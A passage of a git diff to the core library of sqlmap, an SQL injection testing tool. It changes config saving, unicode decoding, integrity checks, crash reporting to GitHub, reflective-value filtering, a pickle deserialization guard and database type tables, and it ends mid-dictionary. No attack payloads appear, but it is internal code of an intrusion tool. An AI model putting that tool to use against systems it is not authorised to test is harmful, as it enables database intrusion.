+ + for option, value in conf.items(): + for family, optionData in optDict.items(): + if option in optionData: + userOpts[family].append((option, value, optionData[option])) + + for family, optionData in userOpts.items(): + config.add_section(family) + + optionData.sort() + + for option, value, datatype in optionData: + if datatype and isListLike(datatype): + datatype = datatype[0] + + if option in IGNORE_SAVE_OPTIONS: + continue + + if value is None: + if datatype == OPTION_TYPE.BOOLEAN: + value = "False" + elif datatype in (OPTION_TYPE.INTEGER, OPTION_TYPE.FLOAT): + if option in defaults: + value = str(defaults[option]) + else: + value = "0" + elif datatype == OPTION_TYPE.STRING: + value = "" + + if isinstance(value, basestring): + value = value.replace("\n", "\n ") + + config.set(family, option, value) + + with openFile(filename, "wb") as f: + try: + config.write(f) + except IOError, ex: + errMsg = "something went wrong while trying " + errMsg += "to write to the configuration file '%s' ('%s')" % (filename, getSafeExString(ex)) + raise SqlmapSystemException(errMsg) + def initTechnique(technique=None): """ Prepares data for technique specified @@ -2796,7 +3047,13 @@ def unArrayizeValue(value): """ if isListLike(value): - value = value[0] if len(value) > 0 else None + if not value: + value = None + elif len(value) == 1 and not isListLike(value[0]): + value = value[0] + else: + _ = filter(lambda _: _ is not None, (_ for _ in flattenValue(value))) + value = _[0] if len(_) > 0 else None return value @@ -2886,7 +3143,7 @@ def showHttpErrorCodes(): msg += "could mean that some kind of protection is involved (e.g. WAF)" logger.debug(msg) -def openFile(filename, mode='r', encoding=UNICODE_ENCODING, errors="replace", buffering=1): +def openFile(filename, mode='r', encoding=UNICODE_ENCODING, errors="replace", buffering=1): # "buffering=1" means line buffered (Reference: http://stackoverflow.com/a/3168436) """ Returns file handle of a given filename """ @@ -2917,7 +3174,17 @@ def decodeIntToUnicode(value): _ = "%x" % value if len(_) % 2 == 1: _ = "0%s" % _ - retVal = getUnicode(hexdecode(_), encoding="UTF-16" if Backend.isDbms(DBMS.MSSQL) else None) + raw = hexdecode(_) + + if Backend.isDbms(DBMS.MYSQL): + # https://github.com/sqlmapproject/sqlmap/issues/1531 + retVal = getUnicode(raw, conf.charset or UNICODE_ENCODING) + elif Backend.isDbms(DBMS.MSSQL): + retVal = getUnicode(raw, "UTF-16-BE") + elif Backend.getIdentifiedDbms() in (DBMS.PGSQL, DBMS.ORACLE): + retVal = unichr(value) + else: + retVal = getUnicode(raw, conf.charset) else: retVal = getUnicode(chr(value)) except: @@ -2925,6 +3192,42 @@ def decodeIntToUnicode(value): return retVal +def md5File(filename): + """ + Calculates MD5 digest of a file + Reference: http://stackoverflow.com/a/3431838 + """ + + checkFile(filename) + + digest = hashlib.md5() + with open(filename, "rb") as f: + for chunk in iter(lambda: f.read(4096), ""): + digest.update(chunk) + + return digest.hexdigest() + +def checkIntegrity(): + """ + Checks integrity of code files during the unhandled exceptions + """ + + if not paths: + return + + logger.debug("running code integrity check") + + retVal = True + for checksum, _ in (re.split(r'\s+', _) for _ in getFileItems(paths.CHECKSUM_MD5)): + path = os.path.normpath(os.path.join(paths.SQLMAP_ROOT_PATH, _)) + if not os.path.isfile(path): + logger.error("missing file detected '%s'" % path) + retVal = False + elif md5File(path) != checksum: + logger.error("wrong checksum of file '%s' detected" % path) + retVal = False + return retVal + def unhandledExceptionMessage(): """ Returns detailed message about occurred unhandled exception @@ -2941,9 +3244,18 @@ def unhandledExceptionMessage(): errMsg += "sqlmap version: %s\n" % VERSION_STRING[VERSION_STRING.find('/') + 1:] errMsg += "Python version: %s\n" % PYVERSION errMsg += "Operating system: %s\n" % PLATFORM - errMsg += "Command line: %s\n" % re.sub(r".+?\bsqlmap.py\b", "sqlmap.py", " ".join(sys.argv)) + errMsg += "Command line: %s\n" % re.sub(r".+?\bsqlmap.py\b", "sqlmap.py", getUnicode(" ".join(sys.argv), encoding=sys.stdin.encoding)) errMsg += "Technique: %s\n" % (enumValueToNameLookup(PAYLOAD.TECHNIQUE, kb.technique) if kb.get("technique") else ("DIRECT" if conf.get("direct") else None)) - errMsg += "Back-end DBMS: %s" % ("%s (fingerprinted)" % Backend.getDbms() if Backend.getDbms() is not None else "%s (identified)" % Backend.getIdentifiedDbms()) + errMsg += "Back-end DBMS:" + + if Backend.getDbms() is not None: + errMsg += " %s (fingerprinted)" % Backend.getDbms() + + if Backend.getIdentifiedDbms() is not None and (Backend.getDbms() is None or Backend.getIdentifiedDbms() != Backend.getDbms()): + errMsg += " %s (identified)" % Backend.getIdentifiedDbms() + + if not errMsg.endswith(')'): + errMsg += " None" return errMsg @@ -2973,21 +3285,36 @@ def createGithubIssue(errMsg, excMsg): msg += "with the unhandled exception information at " msg += "the official Github repository? [y/N] " try: - test = readInput(msg, default="N") + choice = readInput(msg, default='N', boolean=True) except: - test = None + choice = None - if test and test[0] in ("y", "Y"): + if choice: ex = None errMsg = errMsg[errMsg.find("\n"):] + req = urllib2.Request(url="https://api.github.com/search/issues?q=%s" % urllib.quote("repo:sqlmapproject/sqlmap Unhandled exception (#%s)" % key)) + + try: + content = urllib2.urlopen(req).read() + _ = json.loads(content) + duplicate = _["total_count"] > 0 + closed = duplicate and _["items"][0]["state"] == "closed" + if duplicate: + warnMsg = "issue seems to be already reported" + if closed: + warnMsg += " and resolved. Please update to the latest " + warnMsg += "development version from official GitHub repository at '%s'" % GIT_PAGE + logger.warn(warnMsg) + return + except: + pass data = {"title": "Unhandled exception (#%s)" % key, "body": "```%s\n```\n```\n%s```" % (errMsg, excMsg)} req = urllib2.Request(url="https://api.github.com/repos/sqlmapproject/sqlmap/issues", data=json.dumps(data), headers={"Authorization": "token %s" % GITHUB_REPORT_OAUTH_TOKEN.decode("base64")}) try: - f = urllib2.urlopen(req) - content = f.read() + content = urllib2.urlopen(req).read() except Exception, ex: content = None @@ -3004,7 +3331,7 @@ def createGithubIssue(errMsg, excMsg): else: warnMsg = "something went wrong while creating a Github issue" if ex: - warnMsg += " ('%s')" % ex + warnMsg += " ('%s')" % getSafeExString(ex) if "Unauthorized" in warnMsg: warnMsg += ". Please update to the latest revision" logger.warn(warnMsg) @@ -3016,7 +3343,7 @@ def maskSensitiveData(msg): retVal = getUnicode(msg) - for item in filter(None, map(lambda x: conf.get(x), ("hostname", "googleDork", "authCred", "proxyCred", "tbl", "db", "col", "user", "cookie", "proxy", "rFile", "wFile", "dFile"))): + for item in filter(None, map(lambda x: conf.get(x), SENSITIVE_OPTIONS)): regex = SENSITIVE_DATA_REGEX % re.sub("(\W)", r"\\\1", getUnicode(item)) while extractRegexResult(regex, retVal): value = extractRegexResult(regex, retVal) @@ -3027,7 +3354,6 @@ def maskSensitiveData(msg): if match: retVal = retVal.replace(match.group(3), '*' * len(match.group(3))) - if getpass.getuser(): retVal = re.sub(r"(?i)\b%s\b" % re.escape(getpass.getuser()), "*" * len(getpass.getuser()), retVal) @@ -3089,14 +3415,6 @@ def intersect(valueA, valueB, lowerCase=False): return retVal -def cpuThrottle(value): - """ - Does a CPU throttling for lesser CPU consumption - """ - - delay = 0.00001 * (value ** 2) - time.sleep(delay) - def removeReflectiveValues(content, payload, suppressWarning=False): """ Neutralizes reflective values in a given content based on a payload @@ -3105,59 +3423,86 @@ def removeReflectiveValues(content, payload, suppressWarning=False): retVal = content - if all([content, payload]) and isinstance(content, unicode) and kb.reflectiveMechanism and not kb.heuristicMode: - def _(value): - while 2 * REFLECTED_REPLACEMENT_REGEX in value: - value = value.replace(2 * REFLECTED_REPLACEMENT_REGEX, REFLECTED_REPLACEMENT_REGEX) - return value + try: + if all([content, payload]) and isinstance(content, unicode) and kb.reflectiveMechanism and not kb.heuristicMode: + def _(value): + while 2 * REFLECTED_REPLACEMENT_REGEX in value: + value = value.replace(2 * REFLECTED_REPLACEMENT_REGEX, REFLECTED_REPLACEMENT_REGEX) + return value - payload = getUnicode(urldecode(payload.replace(PAYLOAD_DELIMITER, ''), convall=True)) - regex = _(filterStringValue(payload, r"[A-Za-z0-9]", REFLECTED_REPLACEMENT_REGEX.encode("string-escape"))) + payload = getUnicode(urldecode(payload.replace(PAYLOAD_DELIMITER, ''), convall=True)) + regex = _(filterStringValue(payload, r"[A-Za-z0-9]", REFLECTED_REPLACEMENT_REGEX.encode("string-escape"))) - if regex != payload: - if all(part.lower() in content.lower() for part in filter(None, regex.split(REFLECTED_REPLACEMENT_REGEX))[1:]): # fast optimization check - parts = regex.split(REFLECTED_REPLACEMENT_REGEX) - retVal = content.replace(payload, REFLECTED_VALUE_MARKER) # dummy approach + if regex != payload: + if all(part.lower() in content.lower() for part in filter(None, regex.split(REFLECTED_REPLACEMENT_REGEX))[1:]): # fast optimization check + parts = regex.split(REFLECTED_REPLACEMENT_REGEX) + retVal = content.replace(payload, REFLECTED_VALUE_MARKER) # dummy approach - if len(parts) > REFLECTED_MAX_REGEX_PARTS: # preventing CPU hogs - regex = _("%s%s%s" % (REFLECTED_REPLACEMENT_REGEX.join(parts[:REFLECTED_MAX_REGEX_PARTS / 2]), REFLECTED_REPLACEMENT_REGEX, REFLECTED_REPLACEMENT_REGEX.join(parts[-REFLECTED_MAX_REGEX_PARTS / 2:]))) + if len(parts) > REFLECTED_MAX_REGEX_PARTS: # preventing CPU hogs + regex = _("%s%s%s" % (REFLECTED_REPLACEMENT_REGEX.join(parts[:REFLECTED_MAX_REGEX_PARTS / 2]), REFLECTED_REPLACEMENT_REGEX, REFLECTED_REPLACEMENT_REGEX.join(parts[-REFLECTED_MAX_REGEX_PARTS / 2:]))) - parts = filter(None, regex.split(REFLECTED_REPLACEMENT_REGEX)) + parts = filter(None, regex.split(REFLECTED_REPLACEMENT_REGEX)) - if regex.startswith(REFLECTED_REPLACEMENT_REGEX): - regex = r"%s%s" % (REFLECTED_BORDER_REGEX, regex[len(REFLECTED_REPLACEMENT_REGEX):]) - else: - regex = r"\b%s" % regex + if regex.startswith(REFLECTED_REPLACEMENT_REGEX): + regex = r"%s%s" % (REFLECTED_BORDER_REGEX, regex[len(REFLECTED_REPLACEMENT_REGEX):]) + else: + regex = r"\b%s" % regex - if regex.endswith(REFLECTED_REPLACEMENT_REGEX): - regex = r"%s%s" % (regex[:-len(REFLECTED_REPLACEMENT_REGEX)], REFLECTED_BORDER_REGEX) - else: - regex = r"%s\b" % regex + if regex.endswith(REFLECTED_REPLACEMENT_REGEX): + regex = r"%s%s" % (regex[:-len(REFLECTED_REPLACEMENT_REGEX)], REFLECTED_BORDER_REGEX) + else: + regex = r"%s\b" % regex - retVal = re.sub(r"(?i)%s" % regex, REFLECTED_VALUE_MARKER, retVal) + _retVal = [retVal] + def _thread(regex): + try: + _retVal[0] = re.sub(r"(?i)%s" % regex, REFLECTED_VALUE_MARKER, _retVal[0]) - if len(parts) > 2: - regex = REFLECTED_REPLACEMENT_REGEX.join(parts[1:]) - retVal = re.sub(r"(?i)\b%s\b" % regex, REFLECTED_VALUE_MARKER, retVal) + if len(parts) > 2: + regex = REFLECTED_REPLACEMENT_REGEX.join(parts[1:]) + _retVal[0] = re.sub(r"(?i)\b%s\b" % regex, REFLECTED_VALUE_MARKER, _retVal[0]) + except KeyboardInterrupt: + raise + except: + pass - if retVal != content: - kb.reflectiveCounters[REFLECTIVE_COUNTER.HIT] += 1 - if not suppressWarning: - warnMsg = "reflective value(s) found and filtering out" - singleTimeWarnMessage(warnMsg) + thread = threading.Thread(target=_thread, args=(regex,)) + thread.daemon = True + thread.start() + thread.join(REFLECTED_REPLACEMENT_TIMEOUT) - if re.search(r"FRAME[^>]+src=[^>]*%s" % REFLECTED_VALUE_MARKER, retVal, re.I): - warnMsg = "frames detected containing attacked parameter values. Please be sure to " - warnMsg += "test those separately in case that attack on this page fails" - singleTimeWarnMessage(warnMsg) + if thread.isAlive(): + kb.reflectiveMechanism = False + retVal = content + if not suppressWarning: + debugMsg = "turning off reflection removal mechanism (because of timeouts)" + logger.debug(debugMsg) + else: + retVal = _retVal[0] - elif not kb.testMode and not kb.reflectiveCounters[REFLECTIVE_COUNTER.HIT]: - kb.reflectiveCounters[REFLECTIVE_COUNTER.MISS] += 1 - if kb.reflectiveCounters[REFLECTIVE_COUNTER.MISS] > REFLECTIVE_MISS_THRESHOLD: - kb.reflectiveMechanism = False + if retVal != content: + kb.reflectiveCounters[REFLECTIVE_COUNTER.HIT] += 1 if not suppressWarning: - debugMsg = "turning off reflection removal mechanism (for optimization purposes)" - logger.debug(debugMsg) + warnMsg = "reflective value(s) found and filtering out" + singleTimeWarnMessage(warnMsg) + + if re.search(r"FRAME[^>]+src=[^>]*%s" % REFLECTED_VALUE_MARKER, retVal, re.I): + warnMsg = "frames detected containing attacked parameter values. Please be sure to " + warnMsg += "test those separately in case that attack on this page fails" + singleTimeWarnMessage(warnMsg) + + elif not kb.testMode and not kb.reflectiveCounters[REFLECTIVE_COUNTER.HIT]: + kb.reflectiveCounters[REFLECTIVE_COUNTER.MISS] += 1 + if kb.reflectiveCounters[REFLECTIVE_COUNTER.MISS] > REFLECTIVE_MISS_THRESHOLD: + kb.reflectiveMechanism = False + if not suppressWarning: + debugMsg = "turning off reflection removal mechanism (for optimization purposes)" + logger.debug(debugMsg) + except MemoryError: + kb.reflectiveMechanism = False + if not suppressWarning: + debugMsg = "turning off reflection removal mechanism (because of low memory issues)" + logger.debug(debugMsg) return retVal @@ -3194,7 +3539,7 @@ def safeSQLIdentificatorNaming(name, isTable=False): retVal = "\"%s\"" % retVal.strip("\"") elif Backend.getIdentifiedDbms() in (DBMS.ORACLE,): retVal = "\"%s\"" % retVal.strip("\"").upper() - elif Backend.getIdentifiedDbms() in (DBMS.MSSQL,) and not re.match(r"\A\w+\Z", retVal, re.U): + elif Backend.getIdentifiedDbms() in (DBMS.MSSQL,) and ((retVal or " ")[0].isdigit() or not re.match(r"\A\w+\Z", retVal, re.U)): retVal = "[%s]" % retVal.strip("[]") if _ and DEFAULT_MSSQL_SCHEMA not in retVal and '.' not in re.sub(r"\[[^]]+\]", "", retVal): @@ -3401,16 +3746,35 @@ def randomizeParameterValue(value): value = re.sub(r"%[0-9a-fA-F]{2}", "", value) for match in re.finditer('[A-Z]+', value): - retVal = retVal.replace(match.group(), randomStr(len(match.group())).upper()) + while True: + original = match.group() + candidate = randomStr(len(match.group())).upper() + if original != candidate: + break + + retVal = retVal.replace(original, candidate) for match in re.finditer('[a-z]+', value): - retVal = retVal.replace(match.group(), randomStr(len(match.group())).lower()) + while True: + original = match.group() + candidate = randomStr(len(match.group())).lower() + if original != candidate: + break + + retVal = retVal.replace(original, candidate) for match in re.finditer('[0-9]+', value): - retVal = retVal.replace(match.group(), str(randomInt(len(match.group())))) + while True: + original = match.group() + candidate = str(randomInt(len(match.group()))) + if original != candidate: + break + + retVal = retVal.replace(original, candidate) return retVal +@cachedmethod def asciifyUrl(url, forceQuote=False): """ Attempts to make a unicode URL usuable with ``urllib/urllib2``. @@ -3470,14 +3834,19 @@ def asciifyUrl(url, forceQuote=False): netloc = ':' + password + netloc netloc = username + netloc - if parts.port: - netloc += ':' + str(parts.port) + try: + port = parts.port + except: + port = None + + if port: + netloc += ':' + str(port) return urlparse.urlunsplit([parts.scheme, netloc, path, query, parts.fragment]) def isAdminFromPrivileges(privileges): """ - Inspects privileges to see if those are comming from an admin user + Inspects privileges to see if those are coming from an admin user """ # In PostgreSQL the usesuper privilege means that the @@ -3498,7 +3867,6 @@ def isAdminFromPrivileges(privileges): # In Firebird there is no specific privilege that means # that the user is DBA - # TODO: confirm retVal |= (Backend.isDbms(DBMS.FIREBIRD) and all(_ in privileges for _ in ("SELECT", "INSERT", "UPDATE", "DELETE", "REFERENCES", "EXECUTE"))) return retVal @@ -3528,7 +3896,7 @@ def findPageForms(content, url, raise_=False, addToTargets=False): try: forms = ParseResponse(response, backwards_compat=False) - except UnicodeError: + except (UnicodeError, ValueError): pass except ParseError: if ">> checkSameHost('http://www.target.com/page1.php?id=1', 'http://www.target.com/images/page2.php') + True + >>> checkSameHost('http://www.target.com/page1.php?id=1', 'http://www.target2.com/images/page2.php') + False + """ + + if not urls: + return None + elif len(urls) == 1: + return True + else: + return all(urlparse.urlparse(url or "").netloc.split(':')[0] == urlparse.urlparse(urls[0] or "").netloc.split(':')[0] for url in urls[1:]) + def getHostHeader(url): """ Returns proper Host header value for a given target URL @@ -3662,12 +4052,19 @@ def evaluateCode(code, variables=None): except KeyboardInterrupt: raise except Exception, ex: - errMsg = "an error occurred while evaluating provided code ('%s') " % ex.message + errMsg = "an error occurred while evaluating provided code ('%s') " % getSafeExString(ex) raise SqlmapGenericException(errMsg) def serializeObject(object_): """ Serializes given object + + >>> serializeObject([1, 2, 3, ('a', 'b')]) + 'gAJdcQEoSwFLAksDVQFhVQFihnECZS4=' + >>> serializeObject(None) + 'gAJOLg==' + >>> serializeObject('foobar') + 'gAJVBmZvb2JhcnEBLg==' """ return base64pickle(object_) @@ -3678,6 +4075,8 @@ def unserializeObject(value): >>> unserializeObject(serializeObject([1, 2, 3])) == [1, 2, 3] True + >>> unserializeObject('gAJVBmZvb2JhcnEBLg==') + 'foobar' """ return base64unpickle(value) if value else None @@ -3724,14 +4123,20 @@ def decodeHexValue(value, raw=False): >>> decodeHexValue('3132332031') u'123 1' + >>> decodeHexValue(['0x31', '0x32']) + [u'1', u'2'] """ retVal = value def _(value): retVal = value - if value and isinstance(value, basestring) and len(value) % 2 == 0: - retVal = hexdecode(retVal) + if value and isinstance(value, basestring): + if len(value) % 2 != 0: + retVal = "%s?" % hexdecode(value[:-1]) if len(value) > 1 else value + singleTimeWarnMessage("there was a problem decoding value '%s' from expected hexadecimal form" % value) + else: + retVal = hexdecode(value) if not kb.binaryField and not raw: if Backend.isDbms(DBMS.MSSQL) and value.startswith("0x"): @@ -3805,7 +4210,7 @@ def hashDBRetrieve(key, unserialize=False, checkConf=False): _ = "%s%s%s" % (conf.url or "%s%s" % (conf.hostname, conf.port), key, HASHDB_MILESTONE_VALUE) retVal = conf.hashDB.retrieve(_, unserialize) if kb.resumeValues and not (checkConf and any((conf.flushSession, conf.freshQueries))) else None - if not kb.inferenceMode and not kb.fileReadMode and any(_ in (retVal or "") for _ in (PARTIAL_VALUE_MARKER, PARTIAL_HEX_VALUE_MARKER)): + if not kb.inferenceMode and not kb.fileReadMode and isinstance(retVal, basestring) and any(_ in retVal for _ in (PARTIAL_VALUE_MARKER, PARTIAL_HEX_VALUE_MARKER)): retVal = None return retVal @@ -3824,11 +4229,11 @@ def resetCookieJar(cookieJar): content = readCachedFileContent(conf.loadCookies) lines = filter(None, (line.strip() for line in content.split("\n") if not line.startswith('#'))) - handle, filename = tempfile.mkstemp(prefix="sqlmapcj-") + handle, filename = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.COOKIE_JAR) os.close(handle) # Reference: http://www.hashbangcode.com/blog/netscape-http-cooke-file-parser-php-584.html - with open(filename, "w+b") as f: + with openFile(filename, "w+b") as f: f.write("%s\n" % NETSCAPE_FORMAT_HEADER_COOKIES) for line in lines: _ = line.split("\t") @@ -3862,13 +4267,18 @@ def decloakToTemp(filename): """ content = decloak(filename) - _ = os.path.split(filename[:-1])[-1] + + _ = utf8encode(os.path.split(filename[:-1])[-1]) + prefix, suffix = os.path.splitext(_) prefix = prefix.split(os.extsep)[0] + handle, filename = tempfile.mkstemp(prefix=prefix, suffix=suffix) os.close(handle) + with open(filename, "w+b") as f: f.write(content) + return filename def prioritySortColumns(columns): @@ -3891,8 +4301,11 @@ def getRequestHeader(request, name): """ retVal = None + if request and name: - retVal = max(value if name.upper() == key.upper() else None for key, value in request.header_items()) + _ = name.upper() + retVal = max([value if _ == key.upper() else None for key, value in request.header_items()]) + return retVal def isNumber(value): @@ -3969,3 +4382,18 @@ def pollProcess(process, suppress_errors=False): dataToStdout(" quit unexpectedly with return code %d\n" % returncode) break + +def getSafeExString(ex, encoding=None): + """ + Safe way how to get the proper exception represtation as a string + (Note: errors to be avoided: 1) "%s" % Exception(u'\u0161') and 2) "%s" % str(Exception(u'\u0161')) + """ + + retVal = ex + + if getattr(ex, "message", None): + retVal = ex.message + elif getattr(ex, "msg", None): + retVal = ex.msg + + return getUnicode(retVal or "", encoding=encoding).strip() diff --git a/lib/core/convert.py b/lib/core/convert.py old mode 100644 new mode 100755 index 8f7123a00..802d00cfb --- a/lib/core/convert.py +++ b/lib/core/convert.py @@ -1,17 +1,26 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ +try: + import cPickle as pickle +except: + import pickle +finally: + import pickle as picklePy + import base64 import json -import pickle +import re +import StringIO import sys from lib.core.settings import IS_WIN from lib.core.settings import UNICODE_ENCODING +from lib.core.settings import PICKLE_REDUCE_WHITELIST def base64decode(value): """ @@ -38,7 +47,7 @@ def base64pickle(value): Serializes (with pickle) and encodes to Base64 format supplied (binary) value >>> base64pickle('foobar') - 'gAJVBmZvb2JhcnEALg==' + 'gAJVBmZvb2JhcnEBLg==' """ retVal = None @@ -57,20 +66,36 @@ def base64pickle(value): return retVal -def base64unpickle(value): +def base64unpickle(value, unsafe=False): """ Decodes value from Base64 to plain format and deserializes (with pickle) its content - >>> base64unpickle('gAJVBmZvb2JhcnEALg==') + >>> base64unpickle('gAJVBmZvb2JhcnEBLg==') 'foobar' """ retVal = None + def _(self): + if len(self.stack) > 1: + func = self.stack[-2] + if func not in PICKLE_REDUCE_WHITELIST: + raise Exception, "abusing reduce() is bad, Mkay!" + self.load_reduce() + + def loads(str): + f = StringIO.StringIO(str) + if unsafe: + unpickler = picklePy.Unpickler(f) + unpickler.dispatch[picklePy.REDUCE] = _ + else: + unpickler = pickle.Unpickler(f) + return unpickler.load() + try: - retVal = pickle.loads(base64decode(value)) + retVal = loads(base64decode(value)) except TypeError: - retVal = pickle.loads(base64decode(bytes(value))) + retVal = loads(base64decode(bytes(value))) return retVal @@ -143,6 +168,10 @@ def htmlunescape(value): if value and isinstance(value, basestring): codes = (('<', '<'), ('>', '>'), ('"', '"'), (' ', ' '), ('&', '&')) retVal = reduce(lambda x, y: x.replace(y[0], y[1]), codes, retVal) + try: + retVal = re.sub(r"&#x([^ ;]+);", lambda match: unichr(int(match.group(1), 16)), retVal) + except ValueError: + pass return retVal def singleTimeWarnMessage(message): # Cross-linked function diff --git a/lib/core/data.py b/lib/core/data.py index bb45072ff..c7bd39feb 100644 --- a/lib/core/data.py +++ b/lib/core/data.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/lib/core/datatype.py b/lib/core/datatype.py index 29295727b..10251f389 100644 --- a/lib/core/datatype.py +++ b/lib/core/datatype.py @@ -1,15 +1,13 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ import copy import types -from lib.core.exception import SqlmapDataException - class AttribDict(dict): """ This class defines the sqlmap object, inheriting from Python data @@ -43,7 +41,7 @@ class AttribDict(dict): try: return self.__getitem__(item) except KeyError: - raise SqlmapDataException("unable to access item '%s'" % item) + raise AttributeError("unable to access item '%s'" % item) def __setattr__(self, item, value): """ @@ -93,6 +91,7 @@ class InjectionDict(AttribDict): self.prefix = None self.suffix = None self.clause = None + self.notes = [] # Note: https://github.com/sqlmapproject/sqlmap/issues/1888 # data is a dict with various stype, each which is a dict with # all the information specific for that stype diff --git a/lib/core/decorators.py b/lib/core/decorators.py index 8fa7b03b1..283259d09 100644 --- a/lib/core/decorators.py +++ b/lib/core/decorators.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -15,10 +15,13 @@ def cachedmethod(f, cache={}): def _(*args, **kwargs): try: key = (f, tuple(args), frozenset(kwargs.items())) + if key not in cache: + cache[key] = f(*args, **kwargs) except: key = "".join(str(_) for _ in (f, args, kwargs)) - if key not in cache: - cache[key] = f(*args, **kwargs) + if key not in cache: + cache[key] = f(*args, **kwargs) + return cache[key] return _ diff --git a/lib/core/defaults.py b/lib/core/defaults.py index 6adecbe25..036debe9a 100644 --- a/lib/core/defaults.py +++ b/lib/core/defaults.py @@ -1,17 +1,16 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ from lib.core.datatype import AttribDict _defaults = { - "csvDel": ",", + "csvDel": ',', "timeSec": 5, "googlePage": 1, - "cpuThrottle": 5, "verbose": 1, "delay": 0, "timeout": 30, @@ -22,7 +21,7 @@ _defaults = { "risk": 1, "dumpFormat": "CSV", "tech": "BEUSTQ", - "torType": "HTTP", + "torType": "SOCKS5", } defaults = AttribDict(_defaults) diff --git a/lib/core/dicts.py b/lib/core/dicts.py index b6a0ea2ba..dd681a09a 100644 --- a/lib/core/dicts.py +++ b/lib/core/dicts.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -21,218 +21,268 @@ from lib.core.settings import MAXDB_ALIASES from lib.core.settings import SYBASE_ALIASES from lib.core.settings import DB2_ALIASES from lib.core.settings import HSQLDB_ALIASES +from lib.core.settings import INFORMIX_ALIASES FIREBIRD_TYPES = { - "261": "BLOB", - "14": "CHAR", - "40": "CSTRING", - "11": "D_FLOAT", - "27": "DOUBLE", - "10": "FLOAT", - "16": "INT64", - "8": "INTEGER", - "9": "QUAD", - "7": "SMALLINT", - "12": "DATE", - "13": "TIME", - "35": "TIMESTAMP", - "37": "VARCHAR", - } + 261: "BLOB", + 14: "CHAR", + 40: "CSTRING", + 11: "D_FLOAT", + 27: "DOUBLE", + 10: "FLOAT", + 16: "INT64", + 8: "INTEGER", + 9: "QUAD", + 7: "SMALLINT", + 12: "DATE", + 13: "TIME", + 35: "TIMESTAMP", + 37: "VARCHAR", +} + +INFORMIX_TYPES = { + 0: "CHAR", + 1: "SMALLINT", + 2: "INTEGER", + 3: "FLOAT", + 4: "SMALLFLOAT", + 5: "DECIMAL", + 6: "SERIAL", + 7: "DATE", + 8: "MONEY", + 9: "NULL", + 10: "DATETIME", + 11: "BYTE", + 12: "TEXT", + 13: "VARCHAR", + 14: "INTERVAL", + 15: "NCHAR", + 16: "NVARCHAR", + 17: "INT8", + 18: "SERIAL8", + 19: "SET", + 20: "MULTISET", + 21: "LIST", + 22: "ROW (unnamed)", + 23: "COLLECTION", + 40: "Variable-length opaque type", + 41: "Fixed-length opaque type", + 43: "LVARCHAR", + 45: "BOOLEAN", + 52: "BIGINT", + 53: "BIGSERIAL", + 2061: "IDSSECURITYLABEL", + 4118: "ROW (named)", +} SYBASE_TYPES = { - "14": "floatn", - "8": "float", - "15": "datetimn", - "12": "datetime", - "23": "real", - "28": "numericn", - "10": "numeric", - "27": "decimaln", - "26": "decimal", - "17": "moneyn", - "11": "money", - "21": "smallmoney", - "22": "smalldatetime", - "13": "intn", - "7": "int", - "6": "smallint", - "5": "tinyint", - "16": "bit", - "2": "varchar", - "18": "sysname", - "25": "nvarchar", - "1": "char", - "24": "nchar", - "4": "varbinary", - "80": "timestamp", - "3": "binary", - "19": "text", - "20": "image", - } + 14: "floatn", + 8: "float", + 15: "datetimn", + 12: "datetime", + 23: "real", + 28: "numericn", + 10: "numeric", + 27: "decimaln", + 26: "decimal", + 17: "moneyn", + 11: "money", + 21: "smallmoney", + 22: "smalldatetime", + 13: "intn", + 7: "int", + 6: "smallint", + 5: "tinyint", + 16: "bit", + 2: "varchar", + 18: "sysname", + 25: "nvarchar", + 1: "char", + 24: "nchar", + 4: "varbinary", + 80: "timestamp", + 3: "binary", + 19: "text", + 20: "image", +} MYSQL_PRIVS = { - 1: "select_priv", - 2: "insert_priv", - 3: "update_priv", - 4: "delete_priv", - 5: "create_priv", - 6: "drop_priv", - 7: "reload_priv", - 8: "shutdown_priv", - 9: "process_priv", - 10: "file_priv", - 11: "grant_priv", - 12: "references_priv", - 13: "index_priv", - 14: "alter_priv", - 15: "show_db_priv", - 16: "super_priv", - 17: "create_tmp_table_priv", - 18: "lock_tables_priv", - 19: "execute_priv", - 20: "repl_slave_priv", - 21: "repl_client_priv", - 22: "create_view_priv", - 23: "show_view_priv", - 24: "create_routine_priv", - 25: "alter_routine_priv", - 26: "create_user_priv", - } + 1: "select_priv", + 2: "insert_priv", + 3: "update_priv", + 4: "delete_priv", + 5: "create_priv", + 6: "drop_priv", + 7: "reload_priv", + 8: "shutdown_priv", + 9: "process_priv", + 10: "file_priv", + 11: "grant_priv", + 12: "references_priv", + 13: "index_priv", + 14: "alter_priv", + 15: "show_db_priv", + 16: "super_priv", + 17: "create_tmp_table_priv", + 18: "lock_tables_priv", + 19: "execute_priv", + 20: "repl_slave_priv", + 21: "repl_client_priv", + 22: "create_view_priv", + 23: "show_view_priv", + 24: "create_routine_priv", + 25: "alter_routine_priv", + 26: "create_user_priv", +} PGSQL_PRIVS = { - 1: "createdb", - 2: "super", - 3: "catupd", - } + 1: "createdb", + 2: "super", + 3: "catupd", +} # Reference(s): http://stackoverflow.com/a/17672504 # http://docwiki.embarcadero.com/InterBase/XE7/en/RDB$USER_PRIVILEGES FIREBIRD_PRIVS = { - "S": "SELECT", - "I": "INSERT", - "U": "UPDATE", - "D": "DELETE", - "R": "REFERENCE", - "E": "EXECUTE", - "X": "EXECUTE", - "A": "ALL", 